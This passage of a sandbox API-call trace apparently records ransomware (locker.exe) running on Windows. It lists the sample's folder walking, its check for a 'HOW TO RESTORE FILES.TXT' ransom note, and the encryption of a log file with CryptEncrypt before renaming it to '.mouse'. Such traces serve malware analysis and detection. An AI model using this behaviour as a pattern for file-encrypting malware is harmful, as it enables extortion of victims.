cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0197.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".log", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".log", lpUsedDefaultChar=0x0) returned 4 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b918 [0197.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0197.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43cb20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.926] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b918 | out: hHeap=0x3c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc38 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42ba30 [0197.926] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc38 | out: hHeap=0x3c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd08 [0197.927] AreFileApisANSI () returned 1 [0197.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bd08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0197.927] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5a) returned 0x3ec6e8 [0197.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bd08, cbMultiByte=-1, lpWideCharStr=0x3ec6e8, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT") returned 45 [0197.927] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\logs\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7657229b, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x7657229b, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x7657229b, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x71)) returned 1 [0197.927] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0197.927] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd08 | out: hHeap=0x3c0000) returned 1 [0197.927] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28)) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x41fef0 [0197.927] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0197.927] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x28 [0197.928] CloseHandle (hObject=0x3bc) returned 1 [0197.928] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41fef0 | out: hHeap=0x3c0000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x420418 [0197.928] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420418 | out: hHeap=0x3c0000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x420418 [0197.928] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420418 | out: hHeap=0x3c0000) returned 1 [0197.928] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.928] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d7d0 [0197.928] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d7d0, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.928] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d7d0 | out: hHeap=0x3c0000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x420580 [0197.928] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0197.928] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x28 [0197.928] CloseHandle (hObject=0x3bc) returned 1 [0197.928] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420580 | out: hHeap=0x3c0000) returned 1 [0197.929] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d48 [0197.929] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d08 [0197.929] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0197.929] GetFileType (hFile=0x3bc) returned 0x1 [0197.929] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x403a70 [0197.929] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x403b60 [0197.930] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.930] ReadFile (in: hFile=0x3bc, lpBuffer=0x3f6f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesRead=0x12af714*=0x28, lpOverlapped=0x0) returned 1 [0197.931] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x28, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0197.932] GetVersion () returned 0x23f00206 [0197.932] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0197.934] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x432978) returned 1 [0197.934] CryptSetKeyParam (hKey=0x432978, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0197.934] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.934] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437288*, pdwDataLen=0x12af88c*=0x28, dwBufLen=0x40 | out: pbData=0x437288*, pdwDataLen=0x12af88c*=0x30) returned 1 [0197.935] CryptDestroyKey (hKey=0x432978) returned 1 [0197.935] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0197.935] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0197.935] GetLastError () returned 0x0 [0197.935] SetLastError (dwErrCode=0x0) [0197.935] GetLastError () returned 0x0 [0197.935] SetLastError (dwErrCode=0x0) [0197.935] GetLastError () returned 0x0 [0197.935] SetLastError (dwErrCode=0x0) [0197.935] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.935] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af7c8*=0x30, lpOverlapped=0x0) returned 1 [0197.936] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.936] CloseHandle (hObject=0x3bc) returned 1 [0197.937] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403a70 | out: hHeap=0x3c0000) returned 1 [0197.937] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403b60 | out: hHeap=0x3c0000) returned 1 [0197.937] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x420148 [0197.937] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.937] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d608 [0197.937] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d608, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.937] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d608 | out: hHeap=0x3c0000) returned 1 [0197.937] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa6) returned 0x3efb90 [0197.937] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420148 | out: hHeap=0x3c0000) returned 1 [0197.937] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), lpNewFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.mouse" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.mouse"), dwFlags=0x2) returned 1 [0197.938] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.938] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.mouse" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0197.938] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0197.938] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0197.938] CloseHandle (hObject=0x3bc) returned 1 [0197.938] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.938] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3efb90 | out: hHeap=0x3c0000) returned 1 [0197.938] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d08 | out: hHeap=0x3c0000) returned 1 [0197.939] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d48 | out: hHeap=0x3c0000) returned 1 [0197.939] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42ba30 | out: hHeap=0x3c0000) returned 1 [0197.939] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0197.939] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.939] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0197.939] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4203a0 | out: hHeap=0x3c0000) returned 1 [0197.939] FindNextFileW (in: hFindFile=0x432d78, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12af8a8, ftCreationTime.dwLowDateTime=0x3251e4, ftCreationTime.dwHighDateTime=0x12af960, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x12afa30, ftLastWriteTime.dwLowDateTime=0x36d17a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x32ba97, dwReserved0=0x4203a0, dwReserved1=0x28, cFileName="", cAlternateFileName="茾3ΠB齃Īᓮ2ΠBp")) returned 0 [0197.939] GetLastError () returned 0x12 [0197.939] FindClose (in: hFindFile=0x432d78 | out: hFindFile=0x432d78) returned 1 [0197.939] FindNextFileW (in: hFindFile=0x432cf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4203a0, dwReserved1=0x28, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0197.939] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b218 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="SafeOS", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="SafeOS", cchWideChar=6, lpMultiByteStr=0x12afcd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SafeOS", lpUsedDefaultChar=0x0) returned 6 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.939] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccd8 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43ccd8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.939] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cd00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0197.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.940] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0197.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cad0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0197.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.940] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0197.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cb20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0197.940] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0197.940] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0197.940] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0197.940] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccd8 | out: hHeap=0x3c0000) returned 1 [0197.940] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.940] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", fInfoLevelId=0x1, lpFindFileData=0x12af88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af88c) returned 0x432df8 [0197.990] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4203a0, dwReserved1=0x28, cFileName="..", cAlternateFileName="")) returned 1 [0197.990] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x4203a0, dwReserved1=0x28, cFileName="GetCurrentOOBE.dll", cAlternateFileName="")) returned 1 [0197.990] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42ba30 [0197.990] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42ba30 | out: hHeap=0x3c0000) returned 1 [0197.990] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0197.990] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="GetCurrentOOBE.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0197.990] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc88 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="GetCurrentOOBE.dll", cchWideChar=18, lpMultiByteStr=0x43cc88, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 18 [0197.990] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0197.990] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b950 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x42b950, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 40 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0197.990] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x42bb80, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 40 [0197.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd78 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x42bd78, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 40 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd08 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=40, lpMultiByteStr=0x42bd08, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 40 [0197.991] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd08 | out: hHeap=0x3c0000) returned 1 [0197.991] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd78 | out: hHeap=0x3c0000) returned 1 [0197.991] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0197.991] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b950 | out: hHeap=0x3c0000) returned 1 [0197.991] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b950 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dll", lpUsedDefaultChar=0x0) returned 4 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bc60 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0197.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43ccb0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0197.991] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bc60 | out: hHeap=0x3c0000) returned 1 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccd8 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42ba30 [0197.991] 